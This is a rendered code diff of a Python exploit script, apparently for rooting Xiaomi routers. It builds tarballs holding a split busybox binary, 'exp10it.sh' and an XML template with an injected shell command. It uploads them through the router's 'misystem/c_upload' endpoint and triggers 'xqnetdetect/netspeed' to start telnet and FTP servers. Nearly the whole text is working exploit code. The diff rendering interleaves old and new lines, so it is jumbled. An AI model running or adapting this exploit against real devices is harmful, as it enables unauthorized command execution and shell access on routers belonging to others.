|
|
|
@ -68,55 +68,75 @@ try:
|
|
|
|
except Exception:
|
|
|
|
except Exception:
|
|
|
|
die("Password is not correct!")
|
|
|
|
die("Password is not correct!")
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
dn_tmp = 'tmp/'
|
|
|
|
|
|
|
|
dn_dir = 'data/payload/'
|
|
|
|
|
|
|
|
|
|
|
|
print("Begin creating a payload for the exploit...")
|
|
|
|
print("Begin creating a payload for the exploit...")
|
|
|
|
fn_dir = 'data/payload/'
|
|
|
|
|
|
|
|
fn_tmp = 'tmp/'
|
|
|
|
|
|
|
|
fn_payload1 = 'tmp/payload1.tar.gz'
|
|
|
|
fn_payload1 = 'tmp/payload1.tar.gz'
|
|
|
|
fn_payload2 = 'tmp/payload2.tar.gz'
|
|
|
|
fn_payload2 = 'tmp/payload2.tar.gz'
|
|
|
|
fn_bb1 = fn_tmp + 'busybox_01'
|
|
|
|
fn_payload3 = 'tmp/payload3.tar.gz'
|
|
|
|
fn_bb2 = fn_tmp + 'busybox_02'
|
|
|
|
fn_pfname = 'busybox'
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
fn_pf1 = dn_tmp + fn_pfname + '_01'
|
|
|
|
|
|
|
|
fn_pf2 = dn_tmp + fn_pfname + '_02'
|
|
|
|
|
|
|
|
fn_pf3 = dn_tmp + fn_pfname + '_03'
|
|
|
|
|
|
|
|
|
|
|
|
fn_bb = 'busybox_mips'
|
|
|
|
fn_suffix = '_mips'
|
|
|
|
if dname == 'r3d':
|
|
|
|
if dname == 'r3d':
|
|
|
|
fn_bb = 'busybox_armv7a'
|
|
|
|
fn_suffix = '_armv7a'
|
|
|
|
if dname == "rb03":
|
|
|
|
if dname == "rb03":
|
|
|
|
fn_bb = 'busybox_arm64'
|
|
|
|
fn_suffix = '_arm64'
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
fn_pf = dn_dir + fn_pfname + fn_suffix
|
|
|
|
|
|
|
|
|
|
|
|
if os.path.exists(fn_payload1):
|
|
|
|
if os.path.exists(fn_payload1):
|
|
|
|
os.remove(fn_payload1)
|
|
|
|
os.remove(fn_payload1)
|
|
|
|
if os.path.exists(fn_payload2):
|
|
|
|
if os.path.exists(fn_payload2):
|
|
|
|
os.remove(fn_payload2)
|
|
|
|
os.remove(fn_payload2)
|
|
|
|
|
|
|
|
if os.path.exists(fn_payload3):
|
|
|
|
with open(fn_dir + fn_bb, "rb") as file:
|
|
|
|
os.remove(fn_payload3)
|
|
|
|
bb = file.read()
|
|
|
|
|
|
|
|
fpos = len(bb) // 2
|
|
|
|
with open(fn_pf, "rb") as file:
|
|
|
|
with open(fn_bb1, "wb") as file:
|
|
|
|
pf = file.read()
|
|
|
|
file.write(bb[:fpos])
|
|
|
|
psize = len(pf) // 3
|
|
|
|
with open(fn_bb2, "wb") as file:
|
|
|
|
wsize = psize + 8000
|
|
|
|
file.write(bb[fpos:])
|
|
|
|
with open(fn_pf1, "wb") as file:
|
|
|
|
|
|
|
|
file.write(pf[:wsize])
|
|
|
|
|
|
|
|
pf = pf[wsize:]
|
|
|
|
|
|
|
|
wsize = psize - 8000
|
|
|
|
|
|
|
|
with open(fn_pf2, "wb") as file:
|
|
|
|
|
|
|
|
file.write(pf[:wsize])
|
|
|
|
|
|
|
|
pf = pf[wsize:]
|
|
|
|
|
|
|
|
with open(fn_pf3, "wb") as file:
|
|
|
|
|
|
|
|
file.write(pf)
|
|
|
|
|
|
|
|
|
|
|
|
fn_exploit = "exp10it.sh"
|
|
|
|
fn_exploit = "exp10it.sh"
|
|
|
|
command = "sh /tmp/" + fn_exploit
|
|
|
|
command = "sh /tmp/" + fn_exploit
|
|
|
|
|
|
|
|
|
|
|
|
fn_executor = "speedtest_urls.xml"
|
|
|
|
fn_executor = "speedtest_urls.xml"
|
|
|
|
with open(fn_dir + fn_executor, "rt", encoding = "UTF-8") as file:
|
|
|
|
with open(dn_dir + fn_executor, "rt", encoding = "UTF-8") as file:
|
|
|
|
template = file.read()
|
|
|
|
template = file.read()
|
|
|
|
data = template.format(router_ip_address=ip_addr, command=command)
|
|
|
|
data = template.format(router_ip_address=ip_addr, command=command)
|
|
|
|
with open(fn_tmp + fn_executor, "wt", encoding = "UTF-8", newline = "\n") as file:
|
|
|
|
with open(dn_tmp + fn_executor, "wt", encoding = "UTF-8", newline = "\n") as file:
|
|
|
|
file.write(data)
|
|
|
|
file.write(data)
|
|
|
|
|
|
|
|
|
|
|
|
with tarfile.open(fn_payload1, "w:gz", compresslevel=9) as tar:
|
|
|
|
with tarfile.open(fn_payload1, "w:gz", compresslevel=9) as tar:
|
|
|
|
tar.add(fn_bb1, arcname = os.path.basename(fn_bb1))
|
|
|
|
tar.add(fn_pf1, arcname = os.path.basename(fn_pf1))
|
|
|
|
|
|
|
|
|
|
|
|
with tarfile.open(fn_payload2, "w:gz", compresslevel=9) as tar:
|
|
|
|
with tarfile.open(fn_payload2, "w:gz", compresslevel=9) as tar:
|
|
|
|
tar.add(fn_bb2, arcname = os.path.basename(fn_bb2))
|
|
|
|
tar.add(fn_pf2, arcname = os.path.basename(fn_pf2))
|
|
|
|
tar.add(fn_dir + fn_exploit, arcname = fn_exploit)
|
|
|
|
|
|
|
|
tar.add(fn_tmp + fn_executor, arcname = fn_executor)
|
|
|
|
with tarfile.open(fn_payload3, "w:gz", compresslevel=9) as tar:
|
|
|
|
|
|
|
|
tar.add(fn_pf3, arcname = os.path.basename(fn_pf3))
|
|
|
|
|
|
|
|
tar.add(dn_dir + fn_exploit, arcname = fn_exploit)
|
|
|
|
|
|
|
|
tar.add(dn_tmp + fn_executor, arcname = fn_executor)
|
|
|
|
|
|
|
|
|
|
|
|
if os.path.exists(fn_bb1):
|
|
|
|
if os.path.exists(fn_pf1):
|
|
|
|
os.remove(fn_bb1)
|
|
|
|
os.remove(fn_pf1)
|
|
|
|
if os.path.exists(fn_bb2):
|
|
|
|
if os.path.exists(fn_pf2):
|
|
|
|
os.remove(fn_bb2)
|
|
|
|
os.remove(fn_pf2)
|
|
|
|
|
|
|
|
if os.path.exists(fn_pf3):
|
|
|
|
|
|
|
|
os.remove(fn_pf3)
|
|
|
|
|
|
|
|
|
|
|
|
tgz_size1 = os.path.getsize(fn_payload1)
|
|
|
|
tgz_size1 = os.path.getsize(fn_payload1)
|
|
|
|
if tgz_size1 > 100*1024 - 128:
|
|
|
|
if tgz_size1 > 100*1024 - 128:
|
|
|
|
@ -133,8 +153,11 @@ if (fn_payload1):
|
|
|
|
requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')})
|
|
|
|
requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')})
|
|
|
|
if (fn_payload2):
|
|
|
|
if (fn_payload2):
|
|
|
|
requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')})
|
|
|
|
requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')})
|
|
|
|
|
|
|
|
if (fn_payload3):
|
|
|
|
|
|
|
|
requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')})
|
|
|
|
|
|
|
|
|
|
|
|
print("Running TELNET and FTP servers...")
|
|
|
|
print("Running TELNET and FTP servers...")
|
|
|
|
|
|
|
|
|
|
|
|
requests.get(urlapi + "xqnetdetect/netspeed")
|
|
|
|
requests.get(urlapi + "xqnetdetect/netspeed")
|
|
|
|
|
|
|
|
|
|
|
|
time.sleep(0.5)
|
|
|
|
time.sleep(0.5)
|
|
|
|
|
remittor
3 years ago